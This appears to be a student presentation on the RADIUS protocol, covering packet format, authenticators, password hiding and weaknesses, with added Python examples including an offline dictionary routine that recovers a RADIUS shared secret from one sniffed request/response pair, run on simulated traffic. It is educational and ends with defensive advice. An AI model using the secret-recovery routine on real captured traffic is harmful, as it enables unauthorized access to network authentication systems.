RADIUS (REMOTE AUTHENTICATION DIAL-IN USER SERVICE) PRESENTED BY: AMOGH UBALE CMPE-208 NETWORK ARCHITECTURE AND PROTOCOLS
OUTLINE Introduction to RADIUS AAA Radius Packet Format Properties of Radius Radius Security Experimentation Conclusion
RADIUS: REMOTE AUTHENTICATION DIAL-IN USER SERVICE
Developed for authentication and accounting by Livingston Enterprises in 1991
Later standardized by the IETF: RFC 2865 (RADIUS) and RFC 2866 (RADIUS Accounting)
WHY RADIUS?
Thousands of servers provide different services, and many different users access them.
Each user must be authenticated; authorization and accounting are also required.
RADIUS provides all three (AAA) from one central server instead of a user list on every device.
AAA
AAA stands for authentication, authorization and accounting.
Authentication: verify who the user is
Authorization: decide which services this specific user may use
Accounting: record the service used by the user, for example for billing
FEATURES OF RADIUS
Client/Server Model
Network Security
Flexible Authentication Mechanism
Extensible Protocol
PACKET FORMAT OF RADIUS
CODE (1 byte): identifies the type of packet. Ex: 1 Access-Request, 2 Access-Accept, 3 Access-Reject, 4 Accounting-Request, 5 Accounting-Response
ID (1 byte): used for matching a response with its request
LENGTH (2 bytes): length of the whole packet including attributes (20 to 4096; octets beyond Length are padding, a shorter datagram is discarded)
AUTHENTICATOR (16 bytes): in an Access-Request a random value (Request Authenticator); in every response and in an Accounting-Request an MD5 hash over the packet and the shared secret
ATTRIBUTES (variable length): type-length-value items carrying the specific information of the packet

  1 byte   1 byte   2 bytes   16 bytes         variable length
  CODE     ID       LENGTH    AUTHENTICATOR    ATTRIBUTES
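The following is an added example, not code from the deck or from WinRadius: it decodes a constructed Access-Request datagram into exactly the fields listed above (Code, ID, Length, Authenticator, attributes) and applies the receiver-side checks RFC 2865 section 3 requires (Length range, short datagram, trailing padding, attribute Length of at least 2). The names parse_radius and SAMPLE_ACCESS_REQUEST and the sample bytes are my own; the sample is constructed, not a capture.

```python
import struct

# Code values from RFC 2865 / RFC 2866 that the deck refers to.
CODES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
         4: "Accounting-Request", 5: "Accounting-Response", 11: "Access-Challenge"}
# A few standard attribute types (RFC 2865 section 5, RFC 2869 for type 80).
ATTR_NAMES = {1: "User-Name", 2: "User-Password", 4: "NAS-IP-Address",
              5: "NAS-Port", 40: "Acct-Status-Type", 80: "Message-Authenticator"}


def parse_radius(datagram: bytes) -> dict:
    """Split one RADIUS UDP payload into header fields and a list of (name, value) attributes.

    Enforces the RFC 2865 section 3 rules a receiver must apply: a Length outside
    20..4096 or a datagram shorter than its Length is discarded, octets beyond
    Length are ignored as padding, and every attribute needs a Length >= 2.
    """
    if len(datagram) < 20:
        raise ValueError("shorter than the 20-octet RADIUS header")
    code, ident, length = struct.unpack("!BBH", datagram[:4])
    if not 20 <= length <= 4096:
        raise ValueError(f"invalid Length field {length}")
    if len(datagram) < length:
        raise ValueError("datagram shorter than its Length field")
    attributes = []
    pos = 20
    while pos < length:
        if length - pos < 2:
            raise ValueError("truncated attribute header")
        atype, alen = datagram[pos], datagram[pos + 1]
        # alen < 2 would stop pos from advancing (an infinite loop in a naive parser)
        if alen < 2 or pos + alen > length:
            raise ValueError(f"bad attribute length {alen} at offset {pos}")
        attributes.append((ATTR_NAMES.get(atype, f"Attr-{atype}"), datagram[pos + 2:pos + alen]))
        pos += alen
    return {
        "code": CODES.get(code, f"Code-{code}"),
        "id": ident,
        "length": length,
        "authenticator": datagram[4:20].hex(),
        "attributes": attributes,
    }


# Constructed sample Access-Request (not a real capture): the Request Authenticator is a
# fixed byte pattern here, and the User-Password value stands in for the 16 hidden
# octets a real NAS would send.
SAMPLE_ACCESS_REQUEST = (
    b"\x01"                          # Code 1 = Access-Request
    b"\x2a"                          # Identifier 42
    b"\x00\x31"                      # Length 49 = 20 header + 5 + 6 + 18 attribute octets
    + bytes(range(16))               # Request Authenticator (constructed, NOT random)
    + b"\x01\x05bob"                 # User-Name, length 5, value "bob"
    + b"\x05\x06\x00\x00\x00\x03"    # NAS-Port, length 6, value 3
    + b"\x02\x12" + b"\xaa" * 16     # User-Password, length 18, 16 hidden octets
)

if __name__ == "__main__":
    for key, value in parse_radius(SAMPLE_ACCESS_REQUEST).items():
        print(f"{key:>13}: {value}")
```

The attribute-length check matters in practice: an attribute with Length 0 or 1 would otherwise never advance the offset, and an attribute whose Length runs past the packet would read into the next datagram's memory in a C implementation.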
GENERAL FLOWGRAPH FOR RADIUS
RADIUS DETAILS
RADIUS uses UDP and not TCP. The reasons given in RFC 2865:
A user will not wait several minutes for a login: if the primary server does not answer, the client must retry and fall back to a secondary server on its own timers, which TCP's retransmission and acknowledgement rules do not fit.
No special handling is needed for clients or servers that go offline.
The protocol is stateless, which simplifies the use of UDP.
UDP makes it easy to implement a multi-threaded server that serves many client requests at once.
RADIUS AND SECURITY
Security is rather primitive.
Two main functions are provided: attribute (mainly password) hiding and authentication of messages.
Both functions are built on the MD5 hash function and a shared secret configured on the client and the server.
RADIUS MESSAGE INTEGRITY PROTECTION
Access-Request message: Request Authenticator
It is a 16-byte random number generated by the client (NAS) and placed in the Authenticator field.
It should be globally unique and unpredictable for the lifetime of the shared secret, because it seeds both the password hiding and the Response Authenticator.
On its own it authenticates nothing: the base protocol does not authenticate an Access-Request at all. Weak security provision.
Remedy: addition of a Message-Authenticator attribute (RFC 2869).
MESSAGE-AUTHENTICATOR FIELD
To protect the Access-Request the client computes an HMAC-MD5 over the entire message, keyed with the shared secret (RFC 2869, attribute type 80):
For Access-Request: Message-Authenticator = HMAC-MD5(shared secret; code, id, length, request authenticator, attributes), with the Message-Authenticator value itself set to 16 zero octets during the computation
For Accounting-Request the Authenticator field itself serves this purpose (RFC 2866): Request Authenticator = MD5(code, id, length, 16 zero octets, attributes, shared secret)
RESPONSE AUTHENTICATOR
From server to client (Access-Accept, Access-Reject, Access-Challenge and Accounting-Response)
The value of the Response Authenticator is calculated with MD5 over the response and the Request Authenticator of the matching request:
Response Authenticator = MD5(code, id, length, request authenticator, response attributes, shared secret)
The client recomputes this value and silently discards a response whose authenticator or ID does not match.
ATTRIBUTE HIDING
User-Password hiding (RFC 2865 section 5.2)
The password is padded with zero octets to a multiple of 16; a password of at most 16 octets (the case shown here) becomes a single block.
Client (NAS) generates a Request Authenticator, concatenates the shared secret with it (secret first), calculates the MD5 of the concatenation and XORs the result with the user password:
B = MD5(shared secret, request authenticator)
C = B XOR User-Password (padded)
C is filled in the User-Password attribute carried by the Access-Request message.
For longer passwords each further 16-octet block uses B' = MD5(shared secret, C) of the previous ciphertext block, and so on.
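The three operations on this slide and the two before it (User-Password hiding, the Message-Authenticator attribute, the Response Authenticator, plus the Accounting-Request authenticator) fit in one short module. This is an added example, not code from the deck or from WinRadius. It follows RFC 2865 sections 3 and 5.2, RFC 2866 section 3 and RFC 2869 section 5.14, and also handles passwords longer than 16 octets, which the slide leaves out. The function names, the secret testing123 and the user bob / p@ssw0rd are constructed for the demonstration and are not taken from the deck.

```python
import hashlib
import hmac
import os
import struct

USER_NAME, USER_PASSWORD, ACCT_STATUS_TYPE, MESSAGE_AUTHENTICATOR = 1, 2, 40, 80


def attr(atype: int, value: bytes) -> bytes:
    """One type-length-value attribute; Length counts the two header octets."""
    if not 0 <= len(value) <= 253:
        raise ValueError("attribute value must be 0..253 octets")
    return bytes([atype, len(value) + 2]) + value


def header(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to a multiple of 16 octets; c1 = p1 XOR MD5(S + RA),
    c(i) = p(i) XOR MD5(S + c(i-1)) for the following blocks."""
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 octets")
    padded = password + bytes(-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        b = hashlib.md5(secret + prev).digest()          # note the order: secret first
        c = bytes(x ^ y for x, y in zip(padded[i:i + 16], b))
        out, prev = out + c, c
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Server side of the same operation; the mask chain is driven by the ciphertext."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden User-Password must be a non-zero multiple of 16 octets")
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        b = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], b))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")    # strip the zero padding (passwords cannot contain NUL)


def build_access_request(ident: int, username: bytes, password: bytes, secret: bytes) -> bytes:
    ra = os.urandom(16)           # Request Authenticator: must be unpredictable
    attrs = attr(USER_NAME, username) + attr(USER_PASSWORD, hide_password(password, secret, ra))
    # RFC 2869 5.14: HMAC-MD5 keyed with the secret over the whole packet, with the
    # Message-Authenticator value set to 16 zero octets during the computation.
    zeroed = header(1, ident, ra, attrs + attr(MESSAGE_AUTHENTICATOR, bytes(16)))
    mac = hmac.new(secret, zeroed, hashlib.md5).digest()
    return header(1, ident, ra, attrs + attr(MESSAGE_AUTHENTICATOR, mac))


def attributes(pkt: bytes):
    """Yield (offset, type, value) for each attribute of an already length-checked packet."""
    pos = 20
    while pos < len(pkt):
        atype, alen = pkt[pos], pkt[pos + 1]
        yield pos, atype, pkt[pos + 2:pos + alen]
        pos += alen


def verify_message_authenticator(pkt: bytes, secret: bytes) -> bool:
    for pos, atype, value in attributes(pkt):
        if atype == MESSAGE_AUTHENTICATOR:
            zeroed = pkt[:pos + 2] + bytes(16) + pkt[pos + 18:]
            return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), value)
    return False                  # absent: a server that requires it must reject the request


def response_authenticator(code: int, ident: int, request_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attrs)) + request_auth + attrs + secret).digest()


def build_response(code: int, request: bytes, secret: bytes, attrs: bytes = b"") -> bytes:
    ident, ra = request[1], request[4:20]
    return header(code, ident, response_authenticator(code, ident, ra, attrs, secret), attrs)


def verify_response(request: bytes, response: bytes, secret: bytes) -> bool:
    """Client side: the ID must match and the Response Authenticator must recompute."""
    expected = response_authenticator(response[0], response[1], request[4:20], response[20:], secret)
    return response[1] == request[1] and hmac.compare_digest(expected, response[4:20])


def build_accounting_request(ident: int, attrs: bytes, secret: bytes) -> bytes:
    """RFC 2866 3: Authenticator = MD5(Code + ID + Length + 16 zero octets + Attributes + Secret)."""
    auth = hashlib.md5(struct.pack("!BBH", 4, ident, 20 + len(attrs)) + bytes(16) + attrs + secret).digest()
    return header(4, ident, auth, attrs)


def verify_accounting_request(pkt: bytes, secret: bytes) -> bool:
    expected = hashlib.md5(pkt[:4] + bytes(16) + pkt[20:] + secret).digest()
    return hmac.compare_digest(expected, pkt[4:20])


if __name__ == "__main__":
    secret = b"testing123"       # constructed demo secret, far too weak for real use
    req = build_access_request(7, b"bob", b"p@ssw0rd", secret)
    print("request Message-Authenticator ok:", verify_message_authenticator(req, secret))
    pw = next(v for _, t, v in attributes(req) if t == USER_PASSWORD)
    print("server recovered password:", unhide_password(pw, secret, req[4:20]))
    acc = build_response(2, req, secret)
    print("client accepts Access-Accept:", verify_response(req, acc, secret))
```

Two details are easy to get wrong when reading the slide: the MD5 input is secret first, then Request Authenticator (MD5(S + RA)), and the Message-Authenticator is an HMAC keyed with the secret rather than a plain MD5 of the secret appended to the packet. Note also that the hiding is only as strong as the secret and the randomness of RA: with the same secret, a repeated RA yields the same mask B.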
CLIENT/SERVER IMPLEMENTATION
RADIUS server: WinRadius
Client: WinRadius Test
Database: Microsoft Access
CLIENT (WinRadius Test) -> SERVER (WinRadius, user data in the Access database):
Access-Request -> Access-Accept / Access-Reject
Accounting-Request (start, stop) -> Accounting-Response
Wireshark trace of access request
Wireshark trace for access reply
Wireshark trace of accounting request
Wireshark trace for accounting reply
Wireshark trace for accounting stop request
VULNERABILITIES OF RADIUS
Static, manually configured shared secret (often weak, rarely rotated, and shared by many clients)
The MD5 hash method has known weaknesses
In proxy chaining there is a chain of trust: every proxy on the path sees the traffic and must be trusted
No transport-layer protection exists in the base protocol (RADIUS over TLS, RFC 6614, was added later)
Use of a poor random generator for the Request Authenticator: with the same secret, a repeated authenticator produces the same mask for the hidden password
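One consequence of the first two points together with the Response Authenticator formula on the earlier slide: every input to that MD5 except the secret is visible on the wire, so whoever sniffs one request/response pair can test guesses for the shared secret offline, with no further packets to the server. The example below is added here and is not from the deck; it runs the check against a constructed capture and a constructed wordlist. recover_secret, simulate_capture, the guess list and the secrets are assumptions for the demonstration.

```python
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional, Tuple


def response_authenticator(code: int, ident: int, request_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attrs)) + request_auth + attrs + secret).digest()


def recover_secret(request: bytes, response: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Test candidate secrets offline against one sniffed request/response pair.

    Code, ID, Length and attributes come from the response, the Request Authenticator
    from the request; each guess costs one MD5 and the server is never contacted.
    """
    code, ident, observed = response[0], response[1], response[4:20]
    ra, attrs = request[4:20], response[20:]
    for guess in candidates:
        if hmac.compare_digest(response_authenticator(code, ident, ra, attrs, guess), observed):
            return guess
    return None


def simulate_capture(secret: bytes) -> Tuple[bytes, bytes]:
    """Constructed stand-in for a sniffed Access-Request / Access-Accept pair (no real traffic)."""
    ra = os.urandom(16)
    request = struct.pack("!BBH", 1, 42, 25) + ra + b"\x01\x05bob"     # Code 1, ID 42, User-Name "bob"
    attrs = b"\x08\x06\x0a\x00\x00\x05"                                  # Framed-IP-Address 10.0.0.5
    response = struct.pack("!BBH", 2, 42, 20 + len(attrs)) + response_authenticator(2, 42, ra, attrs, secret) + attrs
    return request, response


# Constructed guess list; a real attacker would use a large dictionary with mangling rules.
WORDLIST = [b"radius", b"password", b"secret", b"testing123", b"admin", b"changeme"]

if __name__ == "__main__":
    weak_req, weak_resp = simulate_capture(b"testing123")                # weak, guessable secret
    print("weak secret recovered:", recover_secret(weak_req, weak_resp, WORDLIST))
    strong_req, strong_resp = simulate_capture(os.urandom(32))           # long random secret
    print("strong secret recovered:", recover_secret(strong_req, strong_resp, WORDLIST))
```

Adding a Message-Authenticator does not change this: the HMAC-MD5 is keyed with the same secret and computed over data that is also visible, so it can be checked offline in exactly the same way. The practical counters are a long random secret per client (so the search space is not a dictionary) and transport protection for the RADIUS traffic itself.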
CONCLUSION
RADIUS is commonly used by embedded systems (routers, switches, etc.) which cannot themselves hold a large user base with distinct authentication information per user
RADIUS facilitates centralized user administration
RADIUS provides a certain level of protection against sniffing and active attacks, but only as much as the shared secret and MD5 provide
Widely implemented by hardware vendors
Diameter is an improvement over RADIUS
REFERENCES
1] RFC 2865, Remote Authentication Dial In User Service (RADIUS): http://www.faqs.org/rfcs/rfc2865.html
2] Book: AAA and Network Security for Mobile Access: RADIUS, Diameter, EAP, PKI and IP Mobility, Madjid Nakhjiri and Mahsa Nakhjiri
3] Book: RADIUS, Jonathan Hassell
4] http://en.wikipedia.org/wiki/RADIUS
5] WinRadius: http://www.itconsult2000.com/en/product/WinRadius.html
THANK YOU. QUESTIONS?
